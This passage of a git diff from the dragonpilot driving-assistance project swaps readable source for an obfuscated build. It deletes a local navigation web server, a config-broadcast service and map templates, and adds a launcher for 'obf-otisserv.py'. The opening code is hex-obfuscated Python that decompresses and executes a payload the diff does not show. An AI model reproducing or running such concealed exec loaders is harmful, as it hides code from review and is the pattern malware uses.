DDODOooDoOoODODoDDOoOoOD:DDODOooDoOoODODoDDOoOoOD(__import__('\x7a\x6c\x69\x62'))),(lambda DDODOooDoOoODODoDDOoOoOD:DDODOooDoOoODODoDDOoOoOD['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda:(lambda DDODOooDoOoODODoDDOoOoOD:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(DDODOooDoOoODODoDDOoOoOD)"),filename='\x49\x49\x6c\x6c\x49\x6c\x49\x49\x49\x6c\x6c\x6c\x49\x6c\x6c\x6c\x6c',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda iijjjiilllijljijjjljij,DDODOooDoOoODODoDDOoOoOD:iijjjiilllijljijjjljij(DDODOooDoOoODODoDDOoOoOD)) + Math(StackOverflow = -81401 * -9718)._while(Negative = 77520 + Modulo._positive) ;MNNNMMMNNMMNMNNMNMMN()(oDODDDooOODOOOOODDODoD(oDDOODooDODDOoDDDDoO(wwwxwwwwxxxxxwxwwxwwww(MMNNMNNNNMMMMNNMNNMMMNMMM('\x76\x61\x72\x73'))),Math.While(_power='xxwxxxxwwxxxxxxwxw')+Math.While(_power='OooOOODDOoDDDoDDDoOO')+Math.While(_power='OO0o0oo0o00Oo0OOoOO0oOO0O')+Math.While(_power='XWXXXXWXXXXXXXWWWWWX')+Math.While(_power='SS222S2S222S2SS22S222S2'))) + + except Exception as _statistics: + if 144634 > 4094384: + Math.execute(code = System(_statistics)) + + elif 255594 > 1067836: + Modulo._while(Negative = -7636 / Modulo._positive) \ No newline at end of file diff --git a/selfdrive/dragonpilot/otisserv b/selfdrive/dragonpilot/otisserv new file mode 100755 index 000000000..33c819ae1 --- /dev/null +++ b/selfdrive/dragonpilot/otisserv @@ -0,0 +1,3 @@ +#!/bin/sh +cd "$(dirname "$0")" +exec python obf-otisserv.py diff --git a/selfdrive/dragonpilot/otisserv.py b/selfdrive/dragonpilot/otisserv.py deleted file mode 100644 index 060d54609..000000000 --- a/selfdrive/dragonpilot/otisserv.py +++ /dev/null @@ -1,412 +0,0 @@ -#!/usr/bin/env python3.8 -#pylint: skip-file -# The MIT License -# -# Copyright (c) 2019-, Rick Lan, dragonpilot community, and a number of other of contributors. -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -# THE SOFTWARE. - -from http.server import BaseHTTPRequestHandler, HTTPServer -from cgi import parse_header, parse_multipart -from urllib.parse import parse_qs, unquote -import json -import requests -import math -from common.basedir import BASEDIR -from common.params import Params -from common.i18n import supported_languages -params = Params() - -hostName = "" -serverPort = 8082 - -pi = 3.1415926535897932384626 -x_pi = 3.14159265358979324 * 3000.0 / 180.0 -a = 6378245.0 -ee = 0.00669342162296594323 - - -class OtisServ(BaseHTTPRequestHandler): - def do_GET(self): - use_amap = params.get_bool('dp_nav_amap_enable') - use_gmap = not use_amap and params.get_bool('dp_nav_gmap_enable') - - if self.path == '/logo.png': - self.get_logo() - return - if self.path == '/?reset=1': - params.put("NavDestination", "") - if use_amap: - if self.path == '/style.css': - self.send_response(200) - self.send_header("Content-type", "text/css") - self.end_headers() - self.get_amap_css() - return - elif self.path == '/index.js': - self.send_response(200) - self.send_header("Content-type", "text/javascript") - self.end_headers() - self.get_amap_js() - return - else: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - if self.get_amap_key() is None or self.get_amap_key_2() is None: - self.display_page_amap_key() - return - if self.get_app_token() is None: - self.display_page_app_token() - return - self.display_page_amap() - elif use_gmap: - if self.path == '/style.css': - self.send_response(200) - self.send_header("Content-type", "text/css") - self.end_headers() - self.get_gmap_css() - return - elif self.path == '/index.js': - self.send_response(200) - self.send_header("Content-type", "text/javascript") - self.end_headers() - self.get_gmap_js() - return - else: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - if self.get_gmap_key() is None: - self.display_page_gmap_key() - return - if self.get_app_token() is None: - self.display_page_app_token() - return - self.display_page_gmap() - else: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - if self.get_public_token() is None: - self.display_page_public_token() - return - if self.get_app_token() is None: - self.display_page_app_token() - return - self.display_page_addr_input() - - def do_POST(self): - use_amap = params.get_bool('dp_nav_amap_enable') - use_gmap = not use_amap and params.get_bool('dp_nav_gmap_enable') - - postvars = self.parse_POST() - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - - if use_amap: - # amap token - if self.get_amap_key() is None or self.get_amap_key_2() is None: - if postvars is None or \ - ("amap_key_val" not in postvars or postvars.get("amap_key_val")[0] == "") or \ - ("amap_key_val_2" not in postvars or postvars.get("amap_key_val_2")[0] == ""): - self.display_page_amap_key() - return - params.put('dp_nav_amap_key', postvars.get("amap_key_val")[0]) - params.put('dp_nav_amap_key_2', postvars.get("amap_key_val_2")[0]) - - elif use_gmap: - # gmap token - if self.get_gmap_key() is None: - if postvars is None or "gmap_key_val" not in postvars or postvars.get("gmap_key_val")[0] == "": - self.display_page_gmap_key() - return - params.put('dp_nav_gmap_key', postvars.get("gmap_key_val")[0]) - - else: - # mapbox public key - if self.get_public_token() is None: - if postvars is None or "pk_token_val" not in postvars or postvars.get("pk_token_val")[0] == "": - self.display_page_public_token() - return - token = postvars.get("pk_token_val")[0] - if "pk." not in token: - self.display_page_public_token("Your token was incorrect!") - return - params.put('dp_nav_mapbox_token_pk', token) - - # app key - if self.get_app_token() is None: - if postvars is None or "sk_token_val" not in postvars or postvars.get("sk_token_val")[0] == "": - self.display_page_app_token() - return - token = postvars.get("sk_token_val")[0] - if "sk." not in token: - self.display_page_app_token("Your token was incorrect!") - return - params.put('dp_nav_mapbox_token_sk', token) - - # nav confirmed - if postvars is not None: - if "lat" in postvars and postvars.get("lat")[0] != "" and "lon" in postvars and postvars.get("lon")[0] != "": - lat = float(postvars.get("lat")[0]) - lng = float(postvars.get("lon")[0]) - save_type = postvars.get("save_type")[0] - name = postvars.get("name")[0] if postvars.get("name") is not None else "" - if use_amap: - lng, lat = self.gcj02towgs84(lng, lat) - params.put('NavDestination', "{\"latitude\": %f, \"longitude\": %f, \"place_name\": \"%s\"}" % (lat, lng, name)) - self.to_json(lat, lng, save_type, name) - # search - if not use_gmap and "addr_val" in postvars: - addr = postvars.get("addr_val")[0] - if addr != "": - real_addr, lat, lon = self.query_addr(addr) - if real_addr is not None: - self.display_page_nav_confirmation(real_addr, lon, lat) - return - else: - self.display_page_addr_input("Place Not Found") - return - if use_amap: - self.display_page_amap() - elif use_gmap: - self.display_page_gmap() - else: - self.display_page_addr_input() - - def get_logo(self): - self.send_response(200) - self.send_header('Content-type','image/png') - self.end_headers() - f = open("%s/selfdrive/assets/img_spinner_comma.png" % BASEDIR, "rb") - self.wfile.write(f.read()) - f.close() - - def get_gmap_css(self): - self.wfile.write(bytes(self.get_parsed_template("gmap/style.css"), "utf-8")) - - def get_gmap_js(self): - lon, lat = self.get_last_lon_lat() - self.wfile.write(bytes(self.get_parsed_template("gmap/index.js", {"{{lat}}": lat, "{{lon}}": lon}), "utf-8")) - - def get_gmap_key(self): - token = params.get("dp_nav_gmap_key", encoding='utf8') - if token is not None and token != "": - return token.rstrip('\x00') - return None - - def get_amap_css(self): - self.wfile.write(bytes(self.get_parsed_template("amap/style.css"), "utf-8")) - - def get_amap_js(self): - lon, lat = self.get_last_lon_lat() - self.wfile.write(bytes(self.get_parsed_template("amap/index.js", {"{{lat}}": lat, "{{lon}}": lon}), "utf-8")) - - def get_amap_key(self): - token = params.get("dp_nav_amap_key", encoding='utf8') - if token is not None and token != "": - return token.rstrip('\x00') - return None - - def get_amap_key_2(self): - token = params.get("dp_nav_amap_key_2", encoding='utf8') - if token is not None and token != "": - return token.rstrip('\x00') - return None - - def get_public_token(self): - token = params.get("dp_nav_mapbox_token_pk", encoding='utf8') - if token is not None and token != "": - return token.rstrip('\x00') - return None - - def get_app_token(self): - token = params.get("dp_nav_mapbox_token_sk", encoding='utf8') - if token is not None and token != "": - return token.rstrip('\x00') - return None - - def get_last_lon_lat(self): - last_pos = Params().get("LastGPSPosition") - if last_pos is not None and last_pos != "": - l = json.loads(last_pos) - return l["longitude"], l["latitude"] - else: - locale = params.get("dp_locale", encoding='utf8') - if locale == "zh-TW": - return "121.3149803", "24.996256935" - return "-117.1662042", "32.7207742" - - def get_lang(self): - lang = params.get("LanguageSetting", encoding='utf8') - try: - if lang is not None: - lang = supported_languages[lang.strip()] - else: - lang = "en-US" - except KeyError: - lang = "en-US" - return lang - - def display_page_gmap_key(self): - self.wfile.write(bytes(self.get_parsed_template("body", {"{{content}}": self.get_parsed_template("gmap/key_input")}), "utf-8")) - - def display_page_amap_key(self): - self.wfile.write(bytes(self.get_parsed_template("body", {"{{content}}": self.get_parsed_template("amap/key_input")}), "utf-8")) - - def display_page_public_token(self, msg = ""): - self.wfile.write(bytes(self.get_parsed_template("body", {"{{content}}": self.get_parsed_template("public_token_input", {"{{msg}}": msg})}), "utf-8")) - - def display_page_app_token(self, msg = ""): - self.wfile.write(bytes(self.get_parsed_template("body", {"{{content}}": self.get_parsed_template("app_token_input", {"{{msg}}": msg})}), "utf-8")) - - def display_page_addr_input(self, msg = ""): - self.wfile.write(bytes(self.get_parsed_template("body", {"{{content}}": self.get_parsed_template("addr_input", {"{{msg}}": msg})}), "utf-8")) - - def display_page_nav_confirmation(self, addr, lon, lat): - content = self.get_parsed_template("addr_input", {"{{msg}}": ""}) + self.get_parsed_template("nav_confirmation", {"{{token}}": self.get_public_token(), "{{lon}}": lon, "{{lat}}": lat, "{{addr}}": addr}) - self.wfile.write(bytes(self.get_parsed_template("body", {"{{content}}": content }), "utf-8")) - - def display_page_gmap(self): - self.wfile.write(bytes(self.get_parsed_template("gmap/index.html", {"{{gmap_key}}": self.get_gmap_key(), "{{language}}": self.get_lang()}), "utf-8")) - - def display_page_amap(self): - self.wfile.write(bytes(self.get_parsed_template("amap/index.html", {"{{amap_key}}": self.get_amap_key(), "{{amap_key_2}}": self.get_amap_key_2()}), "utf-8")) - - def get_parsed_template(self, name, replace = {}): - f = open('%s/selfdrive/dragonpilot/tpl/%s.tpl' % (BASEDIR, name), mode='r', encoding='utf-8') - content = f.read() - for key in replace: - content = content.replace(key, str(replace[key])) - f.close() - return content - - def query_addr(self, addr): - if addr == "": - return None, None, None - query = "https://api.mapbox.com/geocoding/v5/mapbox.places/" + unquote(addr) + ".json?access_token=" + self.get_public_token() + "&limit=1" - # focus on place around last gps position - last_pos = Params().get("LastGPSPosition") - if last_pos is not None and last_pos != "": - l = json.loads(last_pos) - query += "&proximity=%s,%s" % (l["longitude"], l["latitude"]) - - r = requests.get(query) - if r.status_code != 200: - return None, None, None - - j = json.loads(r.text) - if not j["features"]: - return None, None, None - - feature = j["features"][0] - return feature["place_name"], feature["center"][1], feature["center"][0] - - def parse_POST(self): - ctype, pdict = parse_header(self.headers['content-type']) - if ctype == 'application/x-www-form-urlencoded': - length = int(self.headers['content-length']) - postvars = parse_qs( - self.rfile.read(length).decode('utf-8'), - keep_blank_values=1) - else: - postvars = {} - return postvars - - def gcj02towgs84(self, lng, lat): - dlat = self.transform_lat(lng - 105.0, lat - 35.0) - dlng = self.transform_lng(lng - 105.0, lat - 35.0) - radlat = lat / 180.0 * pi - magic = math.sin(radlat) - magic = 1 - ee * magic * magic - sqrtmagic = math.sqrt(magic) - dlat = (dlat * 180.0) / ((a * (1 - ee)) / (magic * sqrtmagic) * pi) - dlng = (dlng * 180.0) / (a / sqrtmagic * math.cos(radlat) * pi) - mglat = lat + dlat - mglng = lng + dlng - return [lng * 2 - mglng, lat * 2 - mglat] - - def transform_lat(self, lng, lat): - ret = -100.0 + 2.0 * lng + 3.0 * lat + 0.2 * lat * lat + 0.1 * lng * lat + 0.2 * math.sqrt(abs(lng)) - ret += (20.0 * math.sin(6.0 * lng * pi) + 20.0 * math.sin(2.0 * lng * pi)) * 2.0 / 3.0 - ret += (20.0 * math.sin(lat * pi) + 40.0 * math.sin(lat / 3.0 * pi)) * 2.0 / 3.0 - ret += (160.0 * math.sin(lat / 12.0 * pi) + 320 * math.sin(lat * pi / 30.0)) * 2.0 / 3.0 - return ret - - def transform_lng(self, lng, lat): - ret = 300.0 + lng + 2.0 * lat + 0.1 * lng * lng + 0.1 * lng * lat + 0.1 * math.sqrt(abs(lng)) - ret += (20.0 * math.sin(6.0 * lng * pi) + 20.0 * math.sin(2.0 * lng * pi)) * 2.0 / 3.0 - ret += (20.0 * math.sin(lng * pi) + 40.0 * math.sin(lng / 3.0 * pi)) * 2.0 / 3.0 - ret += (150.0 * math.sin(lng / 12.0 * pi) + 300.0 * math.sin(lng / 30.0 * pi)) * 2.0 / 3.0 - return ret - - def to_json(self, lat, lng, type = "recent", name = ""): - if name == "": - name = str(lat) + "," + str(lng) - new_dest = {"latitude": float(lat), "longitude": float(lng), "place_name": name} - - if type == "recent": - new_dest["save_type"] = "recent" - else: - new_dest["save_type"] = "favorite" - new_dest["label"] = type - - val = params.get("ApiCache_NavDestinations", encoding='utf8') - if val is not None: - val = val.rstrip('\x00') - dests = [] if val is None else json.loads(val) - - # type idx - type_label_ids = {"home": None, "work": None, "recent": []} - idx = 0 - for d in dests: - if d["save_type"] == "favorite": - type_label_ids[d["label"]] = idx - else: - type_label_ids["recent"].append(idx) - idx += 1 - - if type == "recent": - id = None - if len(type_label_ids["recent"]) > 10: - dests.pop(type_label_ids["recent"][-1]) - else: - id = type_label_ids[type] - - if id is None: - dests.insert(0, new_dest) - else: - dests[id] = new_dest - - params.put("ApiCache_NavDestinations", json.dumps(dests).rstrip("\n\r")) - -def main(): - webServer = HTTPServer((hostName, serverPort), OtisServ) - - try: - webServer.serve_forever() - except KeyboardInterrupt: - pass - - webServer.server_close() - -if __name__ == "__main__": - main() diff --git a/selfdrive/dragonpilot/systemd.py b/selfdrive/dragonpilot/systemd.py deleted file mode 100644 index ec594a28d..000000000 --- a/selfdrive/dragonpilot/systemd.py +++ /dev/null @@ -1,281 +0,0 @@ -#!/usr/bin/env python3 -#pylint: disable=W0105 -# The MIT License -# -# Copyright (c) 2019-, Rick Lan, dragonpilot community, and a number of other of contributors. -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -# THE SOFTWARE. - -''' -This is a service that broadcast dp config values to openpilot's messaging queues -''' -import cereal.messaging as messaging - -from common.dp_conf import confs, get_struct_name, to_struct_val -from common.params import Params, put_bool_nonblocking -import os -#from selfdrive.hardware import HARDWARE -params = Params() -from common.dp_helpers import get_last_modified, LAST_MODIFIED_TIMER_SYSTEMD -import socket -from common.realtime import Ratekeeper, config_realtime_process -import threading -#from selfdrive.dragonpilot.gpx_uploader import gpx_uploader_thread -from typing import Dict, Any -import capnp - -PARAM_PATH = params.get_param_path() + "/" - -HERTZ = 1 - -last_modified_confs: Dict[str, Any] = {} - -def confd_thread(): - config_realtime_process([2], 5) - sm = messaging.SubMaster(['deviceState']) - pm = messaging.PubMaster(['dragonConf']) - - last_dp_msg = None - frame = 0 - update_params = False - modified = None - last_modified = None - last_modified_check = None - started = False - # free_space = 1 - last_started = False - # dashcamd = Dashcamd() - # is_eon = EON - rk = Ratekeeper(HERTZ, print_delay_threshold=None) # Keeps rate at 2 hz - #uploader_thread = None - dp_jetson = params.get_bool('dp_jetson') - - while True: - #if uploader_thread is None: - # uploader_thread = threading.Thread(target=gpx_uploader_thread) - # uploader_thread.start() - - msg = messaging.new_message('dragonConf') - if last_dp_msg is not None: - msg.dragonConf = last_dp_msg - - ''' - =================================================== - load thermalState data every 3 seconds - =================================================== - ''' - # if frame % (HERTZ * 3) == 0: - # sm.update(0) - # if sm.updated['deviceState']: - # started = sm['deviceState'].started - # free_space = sm['deviceState'].freeSpacePercent - ''' - =================================================== - hotspot on boot - we do it after 30 secs just in case - =================================================== - ''' - # if is_eon and frame == (HERTZ * 30) and param_get("dp_hotspot_on_boot", "bool", False): - # os.system("service call wifi 37 i32 0 i32 1 &") - ''' - =================================================== - check dp_last_modified every second - =================================================== - ''' - if not update_params: - last_modified_check, modified = get_last_modified(LAST_MODIFIED_TIMER_SYSTEMD, last_modified_check, modified) - if last_modified != modified: - update_params = True - last_modified = modified - ''' - =================================================== - conditionally set update_params to true - =================================================== - ''' - # force updating param when just started or `started` changed - if frame == 0 or last_started != started: - update_params = True - ''' - =================================================== - push param vals to message - =================================================== - ''' - if update_params: - msg = update_conf_all(confs, msg, frame == 0) - update_params = False - ''' - =================================================== - push once - =================================================== - ''' - # if frame == 0: - # setattr(msg.dragonConf, get_struct_name('dp_locale'), params.get("dp_locale")) - # - # # mirror EndToEndToggle to dp_lane_less_model_ctrl first time, after all - # put_nonblocking('dp_lane_less_mode_ctrl', "1" if params.get_bool('EndToEndToggle') else "0") - ''' - =================================================== - push ip addr every 10 secs - =================================================== - ''' - if frame % (HERTZ * 10) == 0: - msg = update_ip(msg) - ''' - =================================================== - update msg based on some custom logic - =================================================== - ''' - msg = update_custom_logic(msg) - if dp_jetson: - msg.dragonConf.dpUiFace = False - ''' - =================================================== - battery ctrl every 30 secs - PowerMonitor in thermald turns back on every mins - so lets turn it off more frequent - =================================================== - ''' - # if frame % (HERTZ * 30) == 0: - # last_charging_ctrl = process_charging_ctrl(msg, last_charging_ctrl, battery_percent) - ''' - =================================================== - dashcam - =================================================== - ''' - # if msg.dragonConf.dpDashcamd and frame % HERTZ == 0: - # dashcamd.run(started, free_space) - ''' - =================================================== - finalise - =================================================== - ''' - last_dp_msg = msg.dragonConf - last_started = started - pm.send('dragonConf', msg) - frame += 1 - rk.keep_time() - -def update_conf(msg, conf, first_run = False): - conf_type = conf.get('conf_type') - - if 'param' in conf_type and 'struct' in conf_type: - access_time = os.path.getatime(PARAM_PATH + conf['name']) - if (last_modified_confs.get(conf['name'])) is not None and last_modified_confs.get(conf['name']) == access_time: - return msg - - update_this_conf = True - - if not first_run: - update_once = conf.get('update_once') - if update_once is not None and update_once is True: - return msg - if update_this_conf: - update_this_conf = check_dependencies(msg, conf) - - if update_this_conf: - msg = set_message(msg, conf) - if os.path.isfile(PARAM_PATH + conf['name']): - last_modified_confs[conf['name']] = access_time - return msg - -def update_conf_all(confs, msg, first_run = False): - for conf in confs: - msg = update_conf(msg, conf, first_run) - return msg - -# def process_charging_ctrl(msg, last_charging_ctrl, battery_percent): -# charging_ctrl = msg.dragonConf.dpChargingCtrl -# if last_charging_ctrl != charging_ctrl: -# HARDWARE.set_battery_charging(True) -# if charging_ctrl: -# if battery_percent >= msg.dragonConf.dpDischargingAt and HARDWARE.get_battery_charging(): -# HARDWARE.set_battery_charging(False) -# elif battery_percent <= msg.dragonConf.dpChargingAt and not HARDWARE.get_battery_charging(): -# HARDWARE.set_battery_charging(True) -# return charging_ctrl - -def update_custom_logic(msg): - return msg -# if msg.dragonConf.dpAtl: -# msg.dragonConf.dpAllowGas = True -# msg.dragonConf.dpGearCheck = False -# if not msg.dragonConf.dpAtlOpLong: -# # msg.dragonConf.dpFollowingProfileCtrl = False -# msg.dragonConf.dpAccelProfileCtrl = False -# if msg.dragonConf.dpLcMinMph > msg.dragonConf.dpLcAutoMinMph: -# put_nonblocking('dp_lc_auto_min_mph', str(msg.dragonConf.dpLcMinMph)) -# msg.dragonConf.dpLcAutoMinMph = msg.dragonConf.dpLcMinMph -# return msg - - -def update_ip(msg): - val = 'N/A' - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - try: - # doesn't even have to be reachable - s.connect(('10.255.255.255', 1)) - IP = s.getsockname()[0] - except: - IP = 'N/A' - finally: - s.close() - setattr(msg.dragonConf, get_struct_name('dp_ip_addr'), IP) - return msg - - -def set_message(msg, conf): - val = params.get(conf['name'], encoding='utf8') - if val is not None: - val = val.rstrip('\x00') - else: - val = conf.get('default') - params.put(conf['name'], str(val)) - struct_val = to_struct_val(conf['name'], val) - orig_val = struct_val - if struct_val is not None: - if conf.get('min') is not None: - struct_val = max(struct_val, conf.get('min')) - if conf.get('max') is not None: - struct_val = min(struct_val, conf.get('max')) - if orig_val != struct_val: - params.put(conf['name'], str(struct_val)) - try: - setattr(msg.dragonConf, get_struct_name(conf['name']), struct_val) - except capnp.lib.capnp.KjException: - pass - - return msg - -def check_dependencies(msg, conf): - passed = True - # if has dependency and the depend param val is not in depend_vals, we dont update that conf val - # this should reduce chance of reading unnecessary params - dependencies = conf.get('depends') - if dependencies is not None: - for dependency in dependencies: - if getattr(msg.dragonConf, get_struct_name(dependency['name'])) not in dependency['vals']: - passed = False - break - return passed - -def main(): - confd_thread() - -if __name__ == "__main__": - main() diff --git a/selfdrive/dragonpilot/tpl/addr_input.tpl b/selfdrive/dragonpilot/tpl/addr_input.tpl deleted file mode 100644 index 4bb2bac1e..000000000 --- a/selfdrive/dragonpilot/tpl/addr_input.tpl +++ /dev/null @@ -1,9 +0,0 @@ -
-
-
- -
{{msg}}
- -
-
-
\ No newline at end of file diff --git a/selfdrive/dragonpilot/tpl/amap/index.html.tpl b/selfdrive/dragonpilot/tpl/amap/index.html.tpl deleted file mode 100644 index e7fd6dd4a..000000000 --- a/selfdrive/dragonpilot/tpl/amap/index.html.tpl +++ /dev/null @@ -1,47 +0,0 @@ - - - - - - - 输入提示后查询 - - - - - - - - - - - - -
-
-
- -
-
- -
-
- - -
- - - \ No newline at end of file diff --git a/selfdrive/dragonpilot/tpl/amap/index.js.tpl b/selfdrive/dragonpilot/tpl/amap/index.js.tpl deleted file mode 100644 index 845c65bff..000000000 --- a/selfdrive/dragonpilot/tpl/amap/index.js.tpl +++ /dev/null @@ -1,120 +0,0 @@ -var windowsArr = []; -var markers = []; -var map = new AMap.Map("container", { - resizeEnable: true, - center: [{{lon}}, {{lat}}], //地图中心点 - zoom: 13, //地图显示的缩放级别 - keyboardEnable: false, -}); - -var infoWindow; -function openInfo(name, addr, lng, lat) { - //构建信息窗体中显示的内容 - var info = []; - info.push('
'); - info.push(''); - info.push("

" + name + "

"); - info.push("

" + addr + "

"); - info.push(''); - info.push("
"); - - var pos = new AMap.LngLat(lng, lat) - infoWindow = new AMap.InfoWindow({ - position: pos, - isCustom: true, - offset: new AMap.Pixel(0, -30), - content: info.join(""), //使用默认信息窗体框样式,显示信息内容 - }); - - infoWindow.open(map, pos); -} -AMap.plugin(["AMap.Autocomplete", "AMap.PlaceSearch"], function () { - var autoOptions = { - city: "全国", //城市,默认全国 - input: "keyword", //使用联想输入的input的id - }; - autocomplete = new AMap.Autocomplete(autoOptions); - var placeSearch = new AMap.PlaceSearch({ - map: "", - }); - AMap.event.addListener(autocomplete, "select", function (e) { - //TODO 针对选中的poi实现自己的功能 - //重寫搜尋點及其提示資訊begin===== - placeSearch.setCity(e.poi.adcode); - if (e.poi && e.poi.location) { - map.setZoom(17); - map.setCenter(e.poi.location); - } - placeSearch.search(e.poi.name, check_dest); //關鍵字查詢查詢 - - function check_dest(status, result) { - if (status === "complete" && result.info === "OK") { - for (var h = 0; h < result.poiList.pois.length; h++) { - //返回搜尋列表迴圈繫結marker - var jy = result.poiList.pois[h]["location"]; //經緯度 - var name = result.poiList.pois[h]["name"]; //地址 - marker = new AMap.Marker({ - //加點 - map: map, - position: jy, - }); - marker.extData = { - getLng: jy["lng"], - getLat: jy["lat"], - name: name, - address: result.poiList.pois[h]["address"], - }; //自定義想傳入的引數 - - marker.on("click", function (e) { - var hs = e.target.extData; - var content = openInfo( - hs["name"], - hs["address"], - hs["getLng"], - hs["getLat"] - ); - }); - markers.push(marker); - } - } - } - //重寫搜尋點及其提示資訊end===== - }); -}); -var clickEventListener = map.on('click', function(e) { - map.remove(markers); - document.getElementById('longitude').value = e.lnglat.getLng(); - document.getElementById('latitude').value = e.lnglat.getLat(); - lnglatXY = [e.lnglat.getLng(), e.lnglat.getLat()]; - var marker = new AMap.Marker({ - //加點 - map: map, - position: lnglatXY, - }); - marker.extData = { - getLng: e.lnglat.getLng(), - getLat: e.lnglat.getLat(), - }; //自定義想傳入的引數 - - marker.on("click", function (e) { - var hs = e.target.extData; - var content = openInfo( - "", - "(" + hs["getLat"] + ", " + hs["getLng"] + ")", - hs["getLng"], - hs["getLat"] - ); - }); - markers.push(marker); - if (typeof(infoWindow) != "undefined") { - infoWindow.close(); - } -}); \ No newline at end of file diff --git a/selfdrive/dragonpilot/tpl/amap/key_input.tpl b/selfdrive/dragonpilot/tpl/amap/key_input.tpl deleted file mode 100644 index f7efbb150..000000000 --- a/selfdrive/dragonpilot/tpl/amap/key_input.tpl +++ /dev/null @@ -1,11 +0,0 @@ -
-
- 请输入您的高德地图 API KEY -
因系统升级,若于 2021/12/02 前申请 key 的人请重新申请新的「key」和「安全密钥」配对。
-
- - - -
-
-
\ No newline at end of file diff --git a/selfdrive/dragonpilot/tpl/amap/style.css.tpl b/selfdrive/dragonpilot/tpl/amap/style.css.tpl deleted file mode 100644 index c83bb043f..000000000 --- a/selfdrive/dragonpilot/tpl/amap/style.css.tpl +++ /dev/null @@ -1,40 +0,0 @@ -html, body { - margin: 0; - height: 100%; - width: 100%; - position: absolute; -} - -#mapContainer { - top: 0; - left: 0; - right: 0; - bottom: 0; - width: 100%; - height: 100%; -} - -.button-group { - position: absolute; - bottom: 20px; - right: 20px; - font-size: 12px; - padding: 10px; -} - -.button-group .button { - height: 28px; - line-height: 28px; - background-color: #0D9BF2; - color: #FFF; - border: 0; - outline: none; - padding-left: 5px; - padding-right: 5px; - border-radius: 3px; - margin-bottom: 4px; - cursor: pointer; -} -.amap-info-content { - font-size: 12px; -} \ No newline at end of file diff --git a/selfdrive/dragonpilot/tpl/app_token_input.tpl b/selfdrive/dragonpilot/tpl/app_token_input.tpl deleted file mode 100644 index 7bd9b0b66..000000000 --- a/selfdrive/dragonpilot/tpl/app_token_input.tpl +++ /dev/null @@ -1,10 +0,0 @@ -
-
- Set your Mapbox APP TOKEN -
{{msg}}
-
- - -
-
-
\ No newline at end of file diff --git a/selfdrive/dragonpilot/tpl/body.tpl b/selfdrive/dragonpilot/tpl/body.tpl deleted file mode 100644 index 39276e5d7..000000000 --- a/selfdrive/dragonpilot/tpl/body.tpl +++ /dev/null @@ -1,20 +0,0 @@ - - - - - dragonpilot - - - - - - - - - -
-
- {{content}} -
- - \ No newline at end of file diff --git a/selfdrive/dragonpilot/tpl/gmap/index.html.tpl b/selfdrive/dragonpilot/tpl/gmap/index.html.tpl deleted file mode 100644 index d89b82fdc..000000000 --- a/selfdrive/dragonpilot/tpl/gmap/index.html.tpl +++ /dev/null @@ -1,39 +0,0 @@ - - - - - dragonpilot - - - - - - - - - - - - - -
-
-
- -
-
- -
-
-
- - - - diff --git a/selfdrive/dragonpilot/tpl/gmap/index.js.tpl b/selfdrive/dragonpilot/tpl/gmap/index.js.tpl deleted file mode 100644 index 201a2ef02..000000000 --- a/selfdrive/dragonpilot/tpl/gmap/index.js.tpl +++ /dev/null @@ -1,86 +0,0 @@ -// This example adds a search box to a map, using the Google Place Autocomplete -// feature. People can enter geographical searches. The search box will return a -// pick list containing a mix of places and predicted search terms. -// This example requires the Places library. Include the libraries=places -// parameter when you first load the API. For example: -//